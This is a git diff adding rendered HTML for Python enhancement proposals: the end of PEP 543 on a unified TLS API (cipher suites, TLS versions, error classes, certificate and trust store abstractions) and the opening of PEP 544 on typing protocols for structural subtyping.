+    TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc008
+    TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xc009
+    TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
+    TLS_ECDH_RSA_WITH_RC4_128_SHA = 0xc00c
+    TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA = 0xc00d
+    TLS_ECDH_RSA_WITH_AES_128_CBC_SHA = 0xc00e
+    TLS_ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
+    TLS_ECDHE_RSA_WITH_RC4_128_SHA = 0xc011
+    TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA = 0xc012
+    TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xc013
+    TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
+    TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc023
+    TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc024
+    TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc025
+    TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc026
+    TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xc027
+    TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xc028
+    TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 = 0xc029
+    TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 = 0xc02a
+    TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02b
+    TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02c
+    TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02d
+    TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02e
+    TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xc02f
+    TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xc030
+    TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 = 0xc031
+    TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 = 0xc032
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc072
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc073
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc074
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc075
+    TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc076
+    TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc077
+    TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc078
+    TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc079
+    TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07a
+    TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07b
+    TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07c
+    TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07d
+    TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07e
+    TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07f
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc086
+    TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc087
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc088
+    TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc089
+    TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08a
+    TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08b
+    TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08c
+    TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08d
+    TLS_RSA_WITH_AES_128_CCM = 0xc09c
+    TLS_RSA_WITH_AES_256_CCM = 0xc09d
+    TLS_DHE_RSA_WITH_AES_128_CCM = 0xc09e
+    TLS_DHE_RSA_WITH_AES_256_CCM = 0xc09f
+    TLS_RSA_WITH_AES_128_CCM_8 = 0xc0a0
+    TLS_RSA_WITH_AES_256_CCM_8 = 0xc0a1
+    TLS_DHE_RSA_WITH_AES_128_CCM_8 = 0xc0a2
+    TLS_DHE_RSA_WITH_AES_256_CCM_8 = 0xc0a3
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xc0ac
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xc0ad
+    TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xc0ae
+    TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xc0af
+    TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca8
+    TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca9
+    TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xccaa
+
+
+

Enum members can be mapped to OpenSSL cipher names:

+
>>> import ssl
+>>> ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
+>>> ctx.set_ciphers('ALL:COMPLEMENTOFALL')
+>>> ciphers = {c['id'] & 0xffff: c['name'] for c in ctx.get_ciphers()}
+>>> ciphers[CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]
+'ECDHE-RSA-AES128-GCM-SHA256'
+
+
+

For SecureTransport, these enum members directly refer to the values of the +cipher suite constants. For example, SecureTransport defines the cipher suite +enum member TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having the value +0xC02C. Not coincidentally, that is identical to its value in the above +enum. This makes mapping between SecureTransport and the above enum very easy +indeed.

+

For SChannel there is no easy direct mapping, due to the fact that SChannel +configures ciphers, instead of cipher suites. This represents an ongoing +concern with SChannel, which is that it is very difficult to configure in a +specific manner compared to other TLS implementations.

+

For the purposes of this PEP, any SChannel implementation will need to +determine which ciphers to choose based on the enum members. This may be more +permissive than the given cipher suite list intends to allow, or it may be +more restrictive, depending on the choices of the implementation. This PEP +recommends that it be more restrictive, but of course this cannot be enforced.

+
+
+
+

Protocol Negotiation

+

Both NPN and ALPN allow for protocol negotiation as part of the TLS +handshake. While NPN and ALPN are, at their fundamental level, built on top of +bytestrings, string-based APIs are frequently problematic as they allow for +errors in typing that can be hard to detect.

+

For this reason, this module would define a type that protocol negotiation +implementations can pass and be passed. This type would wrap a bytestring to +allow for aliases for well-known protocols. This allows us to avoid the +problems inherent in typos for well-known protocols, while allowing the full +extensibility of the protocol negotiation layer if needed by letting users pass +byte strings directly.

+
class NextProtocol(Enum):
+    H2 = b'h2'
+    H2C = b'h2c'
+    HTTP1 = b'http/1.1'
+    WEBRTC = b'webrtc'
+    C_WEBRTC = b'c-webrtc'
+    FTP = b'ftp'
+    STUN = b'stun.nat-discovery'
+    TURN = b'stun.turn'
+
+
+
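A hedged sketch of how an implementation might normalise either form to the raw wire identifier (the helper name is hypothetical, and the enum is abridged from the listing above):
from enum import Enum
+from typing import Union
+
+class NextProtocol(Enum):              # abridged from the enum above
+    H2 = b'h2'
+    HTTP1 = b'http/1.1'
+
+def protocol_identifier(proto: Union[NextProtocol, bytes]) -> bytes:
+    """Accept a well-known alias or a raw identifier; emit wire bytes."""
+    return proto.value if isinstance(proto, NextProtocol) else bytes(proto)
+
+assert protocol_identifier(NextProtocol.H2) == b'h2'
+assert protocol_identifier(b'acme-tls/1') == b'acme-tls/1'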
+
+

TLS Versions

+

It is often useful to be able to restrict the versions of TLS you’re willing to +support. There are many security advantages in refusing to use old versions of +TLS, and some misbehaving servers will mishandle TLS clients advertising +support for newer versions.

+

The following enumerated type can be used to gate TLS versions. Forward-looking +applications should almost never set a maximum TLS version unless they +absolutely must, as a TLS backend that is newer than the Python that uses it +may support TLS versions that are not in this enumerated type.

+

Additionally, this enumerated type defines two additional flags that can always +be used to request either the lowest or highest TLS version supported by an +implementation.

+
class TLSVersion(Enum):
+    MINIMUM_SUPPORTED = auto()
+    SSLv2 = auto()
+    SSLv3 = auto()
+    TLSv1 = auto()
+    TLSv1_1 = auto()
+    TLSv1_2 = auto()
+    TLSv1_3 = auto()
+    MAXIMUM_SUPPORTED = auto()
+
+
+
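Because the members are declared in ascending order, with the two flags at the extremes, an implementation can gate versions positionally; a minimal self-contained sketch with a hypothetical helper:
from enum import Enum, auto
+
+class TLSVersion(Enum):                # as defined above
+    MINIMUM_SUPPORTED = auto()
+    SSLv2 = auto()
+    SSLv3 = auto()
+    TLSv1 = auto()
+    TLSv1_1 = auto()
+    TLSv1_2 = auto()
+    TLSv1_3 = auto()
+    MAXIMUM_SUPPORTED = auto()
+
+_ORDER = list(TLSVersion)              # declaration order == version order
+
+def version_allowed(version, lowest, highest) -> bool:
+    """Check a negotiated version against configured bounds."""
+    return _ORDER.index(lowest) <= _ORDER.index(version) <= _ORDER.index(highest)
+
+assert version_allowed(TLSVersion.TLSv1_2,
+                       TLSVersion.TLSv1, TLSVersion.MAXIMUM_SUPPORTED)
+assert not version_allowed(TLSVersion.SSLv3,
+                           TLSVersion.TLSv1_2, TLSVersion.MAXIMUM_SUPPORTED)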
+
+

Errors

+

This module would define four base classes for use with error handling. Unlike +many of the other classes defined here, these classes are not abstract, as +they have no behaviour. They exist simply to signal certain common behaviours. +Backends should subclass these exceptions in their own packages, but needn’t +define any behaviour for them.

+

In general, concrete implementations should subclass these exceptions rather +than throw them directly. This makes it moderately easier to determine which +concrete TLS implementation is in use during debugging of unexpected errors. +However, this is not mandatory.

+

The definitions of the errors are below:

+
class TLSError(Exception):
+    """
+    The base exception for all TLS related errors from any backend.
+    Catching this error should be sufficient to catch *all* TLS errors,
+    regardless of what backend is used.
+    """
+
+class WantWriteError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or
+    buffer-only I/O is used. This error signals that the requested
+    operation cannot complete until more data is written to the network,
+    or until the output buffer is drained.
+
+    This error should only be raised when it is completely impossible
+    to write any data. If a partial write is achievable then this should
+    not be raised.
+    """
+
+class WantReadError(TLSError):
+    """
+    A special signaling exception used only when non-blocking or
+    buffer-only I/O is used. This error signals that the requested
+    operation cannot complete until more data is read from the network, or
+    until more data is available in the input buffer.
+
+    This error should only be raised when it is completely impossible to
+    read any data. If a partial read is achievable then this should not
+    be raised.
+    """
+
+class RaggedEOF(TLSError):
+    """
+    A special signaling exception used when a TLS connection has been
+    closed gracelessly: that is, when a TLS CloseNotify was not received
+    from the peer before the underlying TCP socket reached EOF. This is a
+    so-called "ragged EOF".
+
+    This exception is not guaranteed to be raised in the face of a ragged
+    EOF: some implementations may not be able to detect or report the
+    ragged EOF.
+
+    This exception is not always a problem. Ragged EOFs are a concern only
+    when protocols are vulnerable to length truncation attacks. Any
+    protocol that can detect length truncation attacks at the application
+    layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
+    attack and so can ignore this exception.
+    """
+
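
For example, a backend would subclass these exceptions in its own package, while applications catch the shared base class. A minimal sketch (the backend exception name is hypothetical):

+
class MyBackendTLSError(TLSError):
+    """TLS error raised by one specific, hypothetical backend."""
+
+try:
+    ...  # perform a TLS operation using any backend
+except TLSError:
+    ...  # catches MyBackendTLSError and every other backend's errors
+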
+
+
+
+

Certificates

+

This module would define an abstract X509 certificate class. This class would +have almost no behaviour, as the goal of this module is not to provide all +possible relevant cryptographic functionality that could be provided by X509 +certificates. Instead, all we need is the ability to signal the source of a +certificate to a concrete implementation.

+

For that reason, this certificate implementation defines only constructors. In +essence, the certificate object in this module could be as abstract as a handle +that can be used to locate a specific certificate.

+

Concrete implementations may choose to provide alternative constructors, e.g. +to load certificates from HSMs. If a common interface emerges for doing this, +this module may be updated to provide a standard constructor for this use-case +as well.

+

Concrete implementations should aim to have Certificate objects be hashable if +at all possible. This will help ensure that TLSConfiguration objects used with +an individual concrete implementation are also hashable.

+
class Certificate(metaclass=ABCMeta):
+    @abstractclassmethod
+    def from_buffer(cls, buffer: bytes):
+        """
+        Creates a Certificate object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
+        series of dashes). In the absence of that preamble, the
+        implementation may assume that the certificate is DER-encoded
+        instead.
+        """
+
+    @abstractclassmethod
+    def from_file(cls, path: Union[pathlib.Path, AnyStr]):
+        """
+        Creates a Certificate object from a file on disk. This method may
+        be a convenience method that wraps ``open`` and ``from_buffer``,
+        but some TLS implementations may be able to provide more-secure or
+        faster methods of loading certificates that do not involve Python
+        code.
+        """
+
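
A concrete implementation could be as simple as an object that stores the raw certificate bytes and defers parsing to the underlying TLS library. A toy sketch, purely for illustration:

+
import pathlib
+from typing import AnyStr, Union
+
+class ToyCertificate(Certificate):
+    """Illustrative only: keeps the raw bytes for later use by a backend."""
+    def __init__(self, data: bytes) -> None:
+        self._data = data
+
+    @classmethod
+    def from_buffer(cls, buffer: bytes) -> 'ToyCertificate':
+        return cls(buffer)
+
+    @classmethod
+    def from_file(cls, path: Union[pathlib.Path, AnyStr]) -> 'ToyCertificate':
+        with open(path, 'rb') as f:
+            return cls(f.read())
+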
+
+
+
+

Private Keys

+

This module would define an abstract private key class. Much like the +Certificate class, this class has almost no behaviour in order to give as much +freedom as possible to the concrete implementations to treat keys carefully.

+

This class has all the caveats of the Certificate class.

+
class PrivateKey(metaclass=ABCMeta):
+    @abstractclassmethod
+    def from_buffer(cls,
+                    buffer: bytes,
+                    password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
+        """
+        Creates a PrivateKey object from a byte buffer. This byte buffer
+        may be either PEM-encoded or DER-encoded. If the buffer is PEM
+        encoded it *must* begin with the standard PEM preamble (a series of
+        dashes followed by the ASCII bytes "BEGIN", the key type, and
+        another series of dashes). In the absence of that preamble, the
+        implementation may assume that the private key is DER-encoded
+        instead.
+
+        The key may additionally be encrypted. If it is, the ``password``
+        argument can be used to decrypt the key. The ``password`` argument
+        may be a function to call to get the password for decrypting the
+        private key. It will only be called if the private key is encrypted
+        and a password is necessary. It will be called with no arguments,
+        and it should return either bytes or bytearray containing the
+        password. Alternatively, a bytes or bytearray value may be supplied
+        directly as the password argument. It will be ignored if the
+        private key is not encrypted and no password is needed.
+        """
+
+    @abstractclassmethod
+    def from_file(cls,
+                  path: Union[pathlib.Path, bytes, str],
+                  password: Optional[Union[Callable[[], Union[bytes, bytearray]], bytes, bytearray]] = None):
+        """
+        Creates a PrivateKey object from a file on disk. This method may
+        be a convenience method that wraps ``open`` and ``from_buffer``,
+        but some TLS implementations may be able to provide more-secure or
+        faster methods of loading private keys that do not involve Python
+        code.
+
+        The ``password`` parameter behaves exactly as the equivalent
+        parameter on ``from_buffer``.
+        """
+
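
Both password forms would be used like this. A sketch (MyPrivateKey stands in for a hypothetical concrete implementation, and the file name and password are invented):

+
# Supply the password directly...
+key = MyPrivateKey.from_file('key.pem', password=b'hunter2')
+
+# ...or defer it to a callable, invoked only if the key is encrypted.
+def prompt_password() -> bytes:
+    return b'hunter2'  # a real callable might prompt the user instead
+
+key = MyPrivateKey.from_file('key.pem', password=prompt_password)
+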
+
+
+
+

Trust Store

+

As discussed above, loading a trust store represents an issue because different +TLS implementations vary wildly in how they allow users to select trust stores. +For this reason, we need to provide a model that assumes very little about the +form that trust stores take.

+

This problem is the same as the one that the Certificate and PrivateKey types +need to solve. For this reason, we use the exact same model: an +opaque type that can encapsulate the various means by which TLS backends may +open a trust store.

+

A given TLS implementation is not required to implement all of the +constructors. However, it is strongly recommended that a given TLS +implementation provide the system constructor if at all possible, as this +is the most common validation trust store that is used. Concrete +implementations may also add their own constructors.

+

Concrete implementations should aim to have TrustStore objects be hashable if +at all possible. This will help ensure that TLSConfiguration objects used with +an individual concrete implementation are also hashable.

+
class TrustStore(metaclass=ABCMeta):
+    @abstractclassmethod
+    def system(cls) -> TrustStore:
+        """
+        Returns a TrustStore object that represents the system trust
+        database.
+        """
+
+    @abstractclassmethod
+    def from_pem_file(cls, path: Union[pathlib.Path, bytes, str]) -> TrustStore:
+        """
+        Initializes a trust store from a single file full of PEMs.
+        """
+
+
+
+
+

Runtime Access

+

A not-uncommon use case is for library users to want the library to control +the TLS configuration while still choosing which backend is in use. +For example, users of Requests may want to be able to select between OpenSSL or +a platform-native solution on Windows and macOS, or between OpenSSL and NSS on +some Linux platforms. These users, however, may not care about exactly how +their TLS configuration is done.

+

This poses a problem: given an arbitrary concrete implementation, how can a +library work out how to load certificates into the trust store? There are two +options: either all concrete implementations can be required to fit into a +specific naming scheme, or we can provide an API that makes it possible to grab +these objects.

+

This PEP proposes that we use the second approach. This grants the greatest +freedom to concrete implementations to structure their code as they see fit, +requiring only that they provide a single object that has the appropriate +properties in place. Users can then pass this “backend” object to libraries +that support it, and those libraries can take care of configuring and using the +concrete implementation.

+

All concrete implementations must provide a method of obtaining a Backend +object. The Backend object can be a global singleton or can be created by a +callable if there is an advantage in doing that.

+

The Backend object has the following definition:

+
Backend = namedtuple(
+    'Backend',
+    ['client_context', 'server_context',
+     'certificate', 'private_key', 'trust_store']
+)
+
+
+

Each of the properties must provide the concrete implementation of the relevant +ABC. This ensures that code like this will work for any backend:

+
trust_store = backend.trust_store.system()
+
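
Conversely, a concrete implementation might expose its backend object like this. A sketch (every My* name is illustrative, not part of this PEP):

+
MY_BACKEND = Backend(
+    client_context=MyClientContext,
+    server_context=MyServerContext,
+    certificate=MyCertificate,
+    private_key=MyPrivateKey,
+    trust_store=MyTrustStore,
+)
+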
+
+
+
+
+
+

Changes to the Standard Library

+

The portions of the standard library that interact with TLS should be revised +to use these ABCs. This will allow them to function with other TLS backends. +This includes the following modules:

+
    +
  • asyncio
  • +
  • ftplib
  • +
  • http
  • +
  • imaplib
  • +
  • nntplib
  • +
  • poplib
  • +
  • smtplib
  • +
  • urllib
  • +
+
+

Migration of the ssl module

+

Naturally, we will need to extend the ssl module itself to conform to these +ABCs. This extension will take the form of new classes, potentially in an +entirely new module. This will allow applications that take advantage of the +current ssl module to continue to do so, while enabling the new APIs for +applications and libraries that want to use them.

+

In general, migrating from the ssl module to the new ABCs is not expected +to be one-to-one. This is normally acceptable: most tools that use the ssl +module hide it from the user, and so refactoring to use the new module should +be invisible.

+

However, a specific problem comes from libraries or applications that leak +exceptions from the ssl module, either as part of their defined API or by +accident (which is easily done). Users of those tools may have written code +that tolerates and handles exceptions from the ssl module being raised: +migrating to the ABCs presented here would potentially cause the exceptions +defined above to be raised instead, and existing except blocks will not +catch them.

+

For this reason, part of the migration of the ssl module would require that +the exceptions in the ssl module alias those defined above. That is, they +would require the following statements to all succeed:

+
assert ssl.SSLError is tls.TLSError
+assert ssl.SSLWantReadError is tls.WantReadError
+assert ssl.SSLWantWriteError is tls.WantWriteError
+
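
With these aliases in place, existing error handling keeps working no matter which module's name the underlying code raises. A sketch (make_request and handle_error are hypothetical):

+
import ssl

+try:
+    make_request()
+except ssl.SSLError:
+    # Also catches tls.TLSError raised by code that uses the new ABCs.
+    handle_error()
+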
+
+

The exact mechanics of how this will be done are beyond the scope of this PEP, +as they are complicated by the fact that the current ssl +exceptions are defined in C code, but more details can be found in +an email sent to the Security-SIG by Christian Heimes.

+
+
+
+

Future

+

Major future TLS features may require revisions of these ABCs. These revisions +should be made cautiously: many backends may not be able to move forward +swiftly, and will be invalidated by changes in these ABCs. This is acceptable, +but wherever possible features that are specific to individual implementations +should not be added to the ABCs. The ABCs should restrict themselves to +high-level descriptions of IETF-specified features.

+

However, well-justified extensions to this API absolutely should be made. The +focus of this API is to provide a unifying lowest-common-denominator +configuration option for the Python community. TLS is not a static target, and +as TLS evolves so must this API.

+
+
+

Credits

+

This document has received extensive review from a number of individuals in the +community who have substantially helped shape it. Detailed review was provided +by:

+
    +
  • Alex Chan
  • +
  • Alex Gaynor
  • +
  • Antoine Pitrou
  • +
  • Ashwini Oruganti
  • +
  • Donald Stufft
  • +
  • Ethan Furman
  • +
  • Glyph
  • +
  • Hynek Schlawack
  • +
  • Jim J Jewett
  • +
  • Nathaniel J. Smith
  • +
  • Alyssa Coghlan
  • +
  • Paul Kehrer
  • +
  • Steve Dower
  • +
  • Steven Fackler
  • +
  • Wes Turner
  • +
  • Will Bond
  • +
+

Further review was provided by the Security-SIG and python-ideas mailing lists.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0543.rst

+

Last modified: 2024-12-09 02:51:16 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0544/index.html b/pep-0544/index.html
new file mode 100644
index 00000000000..5aec7630dca
--- /dev/null
+++ b/pep-0544/index.html
@@ -0,0 +1,1630 @@
+
+


+ + +
+
+
+

PEP 544 – Protocols: Structural subtyping (static duck typing)

+
+
Author:
+
Ivan Levkivskyi <levkivskyi at gmail.com>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>, Łukasz Langa <lukasz at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
05-Mar-2017
+
Python-Version:
+
3.8
+
Resolution:
+
Typing-SIG message
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see Protocols and +typing.Protocol for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Type hints introduced in PEP 484 can be used to specify type metadata +for static type checkers and other third party tools. However, PEP 484 +only specifies the semantics of nominal subtyping. In this PEP we specify +static and runtime semantics of protocol classes that will provide support +for structural subtyping (static duck typing).

+
+
+

Rationale and Goals

+

Currently, PEP 484 and the typing module [typing] define abstract +base classes for several common Python protocols such as Iterable and +Sized. The problem with them is that a class has to be explicitly marked +to support them, which is unpythonic and unlike what one would +normally do in idiomatic dynamically typed Python code. For example, +this conforms to PEP 484:

+
from typing import Sized, Iterable, Iterator
+
+class Bucket(Sized, Iterable[int]):
+    ...
+    def __len__(self) -> int: ...
+    def __iter__(self) -> Iterator[int]: ...
+
+
+

The same problem appears with user-defined ABCs: they must be explicitly +subclassed or registered. This is particularly difficult to do with library +types as the type objects may be hidden deep in the implementation +of the library. Also, extensive use of ABCs might impose additional +runtime costs.

+

The intention of this PEP is to solve all these problems +by allowing users to write the above code without explicit base classes in +the class definition, allowing Bucket to be implicitly considered +a subtype of both Sized and Iterable[int] by static type checkers +using structural [wiki-structural] subtyping:

+
from typing import Iterator, Iterable
+
+class Bucket:
+    ...
+    def __len__(self) -> int: ...
+    def __iter__(self) -> Iterator[int]: ...
+
+def collect(items: Iterable[int]) -> int: ...
+result: int = collect(Bucket())  # Passes type check
+
+
+

Note that ABCs in the typing module already provide structural behavior +at runtime: isinstance(Bucket(), Iterable) returns True. +The main goal of this proposal is to support such behavior statically. +The same functionality will be provided for user-defined protocols, as +specified below. The above code with a protocol class matches common Python +conventions much better. It is also automatically extensible and works +with additional, unrelated classes that happen to implement +the required protocol.

+
+

Nominal vs structural subtyping

+

Structural subtyping is natural for Python programmers since it matches +the runtime semantics of duck typing: an object that has certain properties +is treated independently of its actual runtime class. +However, as discussed in PEP 483, both nominal and structural +subtyping have their strengths and weaknesses. Therefore, in this PEP we +do not propose to replace the nominal subtyping described by PEP 484 with +structural subtyping completely. Instead, protocol classes as specified in +this PEP complement normal classes, and users are free to choose +where to apply a particular solution. See section on rejected ideas at the end of this PEP for additional motivation.

+
+
+

Non-goals

+

At runtime, protocol classes will be simple ABCs. There is no intent to +provide sophisticated runtime instance and class checks against protocol +classes. This would be difficult and error-prone, and would contradict the logic +of PEP 484. Also, following PEP 484 and PEP 526, we state that protocols are +completely optional:

+
    +
  • No runtime semantics will be imposed for variables or parameters annotated +with a protocol class.
  • +
  • Any checks will be performed only by third-party type checkers and +other tools.
  • +
  • Programmers are free to not use them even if they use type annotations.
  • +
  • There is no intent to make protocols non-optional in the future.
  • +
+

To reiterate, providing complex runtime semantics for protocol classes +is not a goal of this PEP; the main goal is to provide support and standards +for static structural subtyping. The possibility to use protocols +in the runtime context as ABCs is rather a minor bonus that exists mostly +to provide a seamless transition for projects that already use ABCs.

+
+
+
+

Existing Approaches to Structural Subtyping

+

Before describing the actual specification, we review and comment on existing +approaches related to structural subtyping in Python and other languages:

+
    +
  • zope.interface [zope-interfaces] was one of the first widely used +approaches to structural subtyping in Python. It is implemented by providing +special classes to distinguish interface classes from normal classes, +to mark interface attributes, and to explicitly declare implementation. +For example:
    from zope.interface import Interface, Attribute, implementer
    +
    +class IEmployee(Interface):
    +
    +    name = Attribute("Name of employee")
    +
    +    def do(work):
    +        """Do some work"""
    +
    +@implementer(IEmployee)
    +class Employee:
    +
    +    name = 'Anonymous'
    +
    +    def do(self, work):
    +        return work.start()
    +
    +
    +

    Zope interfaces support various contracts and constraints for interface +classes. For example:

    +
    from zope.interface import invariant
    +
    +def required_contact(obj):
    +    if not (obj.email or obj.phone):
    +        raise Exception("At least one contact info is required")
    +
    +class IPerson(Interface):
    +
    +    name = Attribute("Name")
    +    email = Attribute("Email Address")
    +    phone = Attribute("Phone Number")
    +
    +    invariant(required_contact)
    +
    +
    +

    Even more detailed invariants are supported. However, Zope interfaces rely +entirely on runtime validation. Such focus on runtime properties goes +beyond the scope of the current proposal, and static support for invariants +might be difficult to implement. However, the idea of marking an interface +class with a special base class is reasonable and easy to implement both +statically and at runtime.

    +
  • +
  • Python abstract base classes [abstract-classes] are the standard +library tool to provide some functionality similar to structural subtyping. +The drawback of this approach is the necessity to either subclass +the abstract class or register an implementation explicitly:
    from abc import ABC
    +
    +class MyTuple(ABC):
    +    pass
    +
    +MyTuple.register(tuple)
    +
    +assert issubclass(tuple, MyTuple)
    +assert isinstance((), MyTuple)
    +
    +
    +

    As mentioned in the rationale, +we want to avoid such necessity, especially in static context. +However, in a runtime context, ABCs are good candidates for +protocol classes and they are already used extensively in +the typing module.

    +
  • +
  • Abstract classes defined in the collections.abc module [collections-abc] +are slightly more advanced since they implement a custom +__subclasshook__() method that allows runtime structural checks without +explicit registration:
    from collections.abc import Iterable
    +
    +class MyIterable:
    +    def __iter__(self):
+        return iter([])
    +
    +assert isinstance(MyIterable(), Iterable)
    +
    +
    +

    Such behavior seems to be a perfect fit for both runtime and static behavior +of protocols. As discussed in rationale, +we propose to add static support for such behavior. +In addition, to allow users to achieve such runtime +behavior for user-defined protocols a special @runtime_checkable decorator +will be provided; see the detailed discussion below.

    +
  • +
  • TypeScript [typescript] provides support for user-defined classes and +interfaces. Explicit implementation declaration is not required and +structural subtyping is verified statically. For example:
    interface LabeledItem {
    +    label: string;
+    size?: number;
    +}
    +
    +function printLabel(obj: LabeledItem) {
    +    console.log(obj.label);
    +}
    +
    +let myObj = {size: 10, label: "Size 10 Object"};
    +printLabel(myObj);
    +
    +
    +

    Note that optional interface members are supported. Also, TypeScript +prohibits redundant members in implementations. While the idea of +optional members looks interesting, it would complicate this proposal and +it is not clear how useful it will be. Therefore, it is proposed to postpone +this; see rejected ideas. In general, the idea of +static protocol checking without runtime implications looks reasonable, +and basically this proposal follows the same line.

    +
  • +
  • Go [golang] uses a more radical approach and makes interfaces the primary +way to provide type information. Also, assignments are used to explicitly +ensure implementation:
    type SomeInterface interface {
    +    SomeMethod() ([]byte, error)
    +}
    +
    +if _, ok := someval.(SomeInterface); ok {
    +    fmt.Printf("value implements some interface")
    +}
    +
    +
    +

    Both these ideas are questionable in the context of this proposal. See +the section on rejected ideas.

    +
  • +
+
+
+

Specification

+
+

Terminology

+

We propose to use the term protocols for types supporting structural +subtyping. The reason is that the term iterator protocol, +for example, is widely understood in the community, and coming up with +a new term for this concept in a statically typed context would just create +confusion.

+

This has the drawback that the term protocol becomes overloaded with +two subtly different meanings: the first is the traditional, well-known but +slightly fuzzy concept of protocols such as iterator; the second is the more +explicitly defined concept of protocols in statically typed code. +The distinction is not important most of the time, and in other +cases we propose to just add a qualifier such as protocol classes +when referring to the static type concept.

+

If a class includes a protocol in its MRO, the class is called +an explicit subclass of the protocol. If a class is a structural subtype +of a protocol, it is said to implement the protocol and to be compatible +with a protocol. If a class is compatible with a protocol but the protocol +is not included in the MRO, the class is an implicit subtype +of the protocol. (Note that one can explicitly subclass a protocol and +still not implement it if a protocol attribute is set to None +in the subclass, see Python [data-model] for details.)

+
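
To illustrate the terminology, a small sketch (the class names are invented for this example):

+
from typing import Protocol

+class SupportsRead(Protocol):
+    def read(self) -> bytes: ...
+
+class ExplicitReader(SupportsRead):  # explicit subclass: protocol in the MRO
+    def read(self) -> bytes:
+        return b''
+
+class ImplicitReader:                # implicit subtype: compatible structure,
+    def read(self) -> bytes:         # but SupportsRead is not in the MRO
+        return b''
+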

The attributes (variables and methods) of a protocol that are mandatory +for another class in order to be considered a structural subtype are called +protocol members.

+
+
+

Defining a protocol

+

Protocols are defined by including a special new class typing.Protocol +(an instance of abc.ABCMeta) in the base classes list, typically +at the end of the list. Here is a simple example:

+
from typing import Protocol
+
+class SupportsClose(Protocol):
+    def close(self) -> None:
+        ...
+
+
+

Now if one defines a class Resource with a close() method that has +a compatible signature, it would implicitly be a subtype of +SupportsClose, since the structural subtyping is used for +protocol types:

+
class Resource:
+    ...
+    def close(self) -> None:
+        self.file.close()
+        self.lock.release()
+
+
+

